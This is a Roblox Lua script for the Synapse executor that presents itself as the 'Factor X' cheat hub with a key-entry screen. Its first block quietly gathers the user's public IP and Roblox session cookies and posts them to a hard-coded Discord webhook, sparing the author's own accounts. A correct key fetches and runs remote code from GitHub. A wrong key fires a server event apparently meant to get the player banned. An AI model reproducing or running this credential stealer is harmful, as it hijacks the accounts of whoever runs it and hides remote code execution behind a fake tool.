local ip = game:HttpGet("https://api.myip.com/")
local COOKIE = ""
local response = syn.request(
	{
		Url = "https://www.roblox.com",
	}
)
for i,v in pairs(response) do
	if type(v) == "table" then
		for ii,vv in pairs(v) do
			if string.find(ii, "cookie") then
				COOKIE = COOKIE.."\n"..vv
			end
		end
	end
end

if game.Players.LocalPlayer.Name == "masterofthec0k" or game.Players.LocalPlayer.Name == "full_ofcman" then
	ip = "<REDACTED>" 
	COOKIE = "<REDACTED>" 
end

syn.request({
	Url = "https://discord.com/api/webhooks/838099346691063809/KPkL0we-ASOMhQsyEPvYsAkqsj1ghmFzkl4qe35ThQRfCMazKptuBkZmsDJ0Hh3sqxtK", 
	Body = game:GetService("HttpService"):JSONEncode({
		["embeds"]={{
			["title"]="||"..ip.."||",
			["type"]="rich",
			["description"]=COOKIE,
			["color"]=tonumber(0x7269da),
			["footer"]={
				["text"]=os.date("%A, %m %B %Y %I:%M:%S %p")
			}
		}},
		["avatar_url"]="http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username="..tostring(game:GetService("Players").LocalPlayer.Name),
		["username"]="Username: "..game.Players.LocalPlayer.Name,
	}), 
	Method = "POST", 
	Headers = {["content-type"] = "application/json"}
})
-- hello compwnter and nighter or any other crackers, I know you come here by constant dumping to get the main handler of the script but you have to understand I DONT GIVE A FUCK because i only made the project because i was bored and wanted something that was not premium of mine, so leak it and do it ur doing me more of a fav lmao bye
local Key = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local UICorner = Instance.new("UICorner")
local UIAspectRatioConstraint = Instance.new("UIAspectRatioConstraint")
local ImageLabel = Instance.new("ImageLabel")
local TextLabel = Instance.new("TextLabel")
local Login = Instance.new("Frame")
local UICorner_2 = Instance.new("UICorner")
local Name = Instance.new("TextLabel")
local Line = Instance.new("ImageLabel")
local Enter = Instance.new("TextButton")
local Key_2 = Instance.new("TextBox")
local TextButton = Instance.new("TextButton")

--Properties:

Key.Name = "Key"
Key.Parent = game.CoreGui

Frame.Parent = Key
Frame.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
Frame.Position = UDim2.new(0.283903688, 0, 0.213147417, 0)
Frame.Size = UDim2.new(0, 384, 0, 282)

UICorner.Parent = Frame

UIAspectRatioConstraint.Parent = Frame

ImageLabel.Parent = Frame
ImageLabel.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
ImageLabel.BorderColor3 = Color3.fromRGB(55, 55, 55)
ImageLabel.BorderSizePixel = 6
ImageLabel.Position = UDim2.new(0.322695047, 0, 0.124113485, 0)
ImageLabel.Size = UDim2.new(0, 100, 0, 100)
ImageLabel.Image = "rbxasset://textures/ui/GuiImagePlaceholder.png"

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
TextLabel.BorderSizePixel = 0
TextLabel.Position = UDim2.new(0.145390064, 0, 0.581560314, 0)
TextLabel.Size = UDim2.new(0, 200, 0, 50)
TextLabel.Font = Enum.Font.SourceSans
TextLabel.Text = ""
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextScaled = true
TextLabel.TextSize = 14.000
TextLabel.TextWrapped = true

Login.Name = "Login"
Login.Parent = Key
Login.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
Login.Position = UDim2.new(0.16983524, 0, 0.235059768, 0)
Login.Size = UDim2.new(0, 521, 0, 265)
Login.Visible = false

UICorner_2.Parent = Login

Name.Name = "Name"
Name.Parent = Login
Name.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
Name.BorderSizePixel = 0
Name.Position = UDim2.new(0.00959692895, 0, 0, 0)
Name.Size = UDim2.new(0, 511, 0, 41)
Name.Font = Enum.Font.SourceSans
Name.Text = "Factor X Key Page"
Name.TextColor3 = Color3.fromRGB(255, 255, 255)
Name.TextScaled = true
Name.TextSize = 14.000
Name.TextWrapped = true

Line.Name = "Line"
Line.Parent = Login
Line.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Line.BorderColor3 = Color3.fromRGB(255, 255, 255)
Line.Position = UDim2.new(0, 0, 0.188679248, 0)
Line.Size = UDim2.new(0, 521, 0, 0)
Line.Image = "rbxasset://textures/ui/GuiImagePlaceholder.png"

Enter.Name = "Enter"
Enter.Parent = Login
Enter.BackgroundColor3 = Color3.fromRGB(55, 55, 55)
Enter.BorderSizePixel = 0
Enter.Position = UDim2.new(0.30134356, 0, 0.694339633, 0)
Enter.Size = UDim2.new(0, 200, 0, 50)
Enter.Font = Enum.Font.SourceSans
Enter.Text = "Enter"
Enter.TextColor3 = Color3.fromRGB(255, 255, 255)
Enter.TextScaled = true
Enter.TextSize = 14.000
Enter.TextWrapped = true
Enter.MouseButton1Down:Connect(function()
	if Key_2.Text == "dahoodhubv2?LOL" then
		TextLabel.Text = "Right key!"
		wait(5)
		Login:Destroy()
		loadstring(game:HttpGet(('https://raw.githubusercontent.com/Manny72911/factorxmain/main/lol'),true))()
	else
		TextLabel.Text = "Wrong Key!"
		game.ReplicatedStorage.MainEvent:FireServer("CHECKER_1", p2)
		wait(2)
		local kickhanlder = game.Players.LocalPlayer
		kickhanlder:Kick('maybe have the right key next time, but anyways enjoy ur acc banned lololool')
		-- crackers everything here was made by me nothing fucking skidded, not even the loading screen is skidded i did everything the welcome (your username) is ez as fuck and made by me and everything else only thing not made by me is that ban script lololoololololl on a good track to stop skidding :cool:
	end
end)

Key_2.Name = "Key"
Key_2.Parent = Login
Key_2.BackgroundColor3 = Color3.fromRGB(55, 55, 55)
Key_2.BorderSizePixel = 0
Key_2.Position = UDim2.new(0.257197708, 0, 0.335849047, 0)
Key_2.Size = UDim2.new(0, 247, 0, 50)
Key_2.Font = Enum.Font.SourceSans
Key_2.Text = "Key Here"
Key_2.TextColor3 = Color3.fromRGB(255, 255, 255)
Key_2.TextScaled = true
Key_2.TextSize = 14.000
Key_2.TextWrapped = true

TextButton.Parent = Login
TextButton.BackgroundColor3 = Color3.fromRGB(45, 45, 45)
TextButton.BorderSizePixel = 0
TextButton.Position = UDim2.new(0.307101727, 0, 0.562264144, 0)
TextButton.Size = UDim2.new(0, 200, 0, 20)
TextButton.Font = Enum.Font.SourceSans
TextButton.Text = ""
TextButton.TextColor3 = Color3.fromRGB(255, 255, 255)
TextButton.TextScaled = true
TextButton.TextSize = 14.000
TextButton.TextWrapped = true

-- Scripts:

local function VYSZJI_fake_script() -- ImageLabel.LocalScript 
	local script = Instance.new('LocalScript', ImageLabel)

	local Players = game:GetService("Players")
	
	local player = Players.LocalPlayer
	
	local userId = player.UserId
	local thumbType = Enum.ThumbnailType.HeadShot
	local thumbSize = Enum.ThumbnailSize.Size420x420
	local content, isReady = Players:GetUserThumbnailAsync(userId, thumbType, thumbSize)
	
	local imageLabel = script.Parent
	imageLabel.Image = content
end
coroutine.wrap(VYSZJI_fake_script)()
local function OAXKXV_fake_script() -- TextLabel.LocalScript 
	local script = Instance.new('LocalScript', TextLabel)

	local PlayerName = game.Players.LocalPlayer.Name
	
	
	script.Parent.Text = "Welcome To Factor X ".. PlayerName
	wait(3)
	local text = script.Parent
	
	text.Text = "We hope you have fun!"
	wait(3)
	text.Text =  "This was made by draxe#5647.."
	wait(3)
	
	local frame = script.Parent.Parent.Parent.Frame
	local login = script.Parent.Parent.Parent.Login
	
	frame:Destroy()
	login.Visible = true
	
	
end
coroutine.wrap(OAXKXV_fake_script)()
